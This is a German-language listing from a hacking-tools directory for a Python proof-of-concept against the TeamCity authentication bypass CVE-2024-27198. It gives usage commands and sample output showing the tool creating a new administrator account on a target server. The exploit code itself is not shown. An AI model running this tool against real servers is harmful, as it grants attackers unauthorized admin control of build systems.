Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-27198 — ist ein PoC-Tool, das eine Schwachstelle im TeamCity-Server (CVE-2024-27198) angreift | Kitploit
Tools/GitHubGitHub/geniuszly/cve-2024-27198
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubgeniuszly/cve-2024-27198

CVE-2024-27198

ist ein PoC-Tool, das eine Schwachstelle im TeamCity-Server (CVE-2024-27198) angreift

Repository anzeigen
32vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

DE

GenTeamCityExploit ist ein PoC-Tool, das gegen eine Schwachstelle im TeamCity-Server (CVE-2024-27198) vorgeht. Es ermöglicht die Erkennung einer TeamCity-Version und die Erstellung eines neuen Admin-Benutzers durch Ausnutzung eines Authentifizierungs-Bypass-Fehlers.

Funktionen

  • Extrahiert die Version des TeamCity-Servers.
  • Überprüft auf das Vorhandensein einer bekannten Schwachstelle (CVE-2024-27198).
  • Erstellt einen neuen Administrator-Benutzer, falls der Server verwundbar ist.

Voraussetzungen

  • Python 3.6+: Stellen Sie sicher, dass Python installiert ist.
  • Bibliotheken: Installieren Sie die erforderlichen Bibliotheken mit:
    root@kitploit:~
    pip install requests urllib3
    

Verwendung

  1. Klonen Sie das Repository.
    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2024-27198
    
  2. Navigieren Sie in das Verzeichnis.
    root@kitploit:~
    cd CVE-2024-27198
    
  3. Führen Sie das Skript mit den erforderlichen Parametern aus.
    root@kitploit:~
    python3 GenTeamCityAdminCreator.py -t <target_url> -u <username> -p <password>
    
    Parameter:
    • -t, --target: Die URL des Ziel-TeamCity-Servers.
    • -u, --username: Der Benutzername für den neuen Admin-Benutzer.
    • -p, --password: Das Passwort für den neuen Admin-Benutzer.

Beispiel

root@kitploit:~
python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

Beispielausgabe

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[+] Сервер уязвим! Возвращен HTTP код: 200
[+] Пользователь 'newadmin' создан успешно! Перейдите на http://target-teamcity.com/login.html для входа.

Falls der Server nicht verwundbar ist oder die Version nicht gefunden wird:

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[-] Сервер, вероятно, неуязвим. Возвращен HTTP код: 403

Bei einem Verbindungsfehler zum Server:

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://nonexistent-url.com -u newadmin -p securepassword123

[-] Ошибка при попытке соединения с сервером: HTTPConnectionPool(host='nonexistent-url.com', port=80): Max retries exceeded with url: /login.html (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7ff9e1f07df0>: Failed to establish a new connection: [Errno -2] Name or service not known'))

Haftungsausschluss

Dieses Tool ist ausschließlich für Bildungszwecke gedacht und sollte nicht auf Systemen ohne ausdrückliche Genehmigung des Eigentümers verwendet werden. Unautorisierter Zugriff auf Computersysteme ist illegal.

Tool herunterladen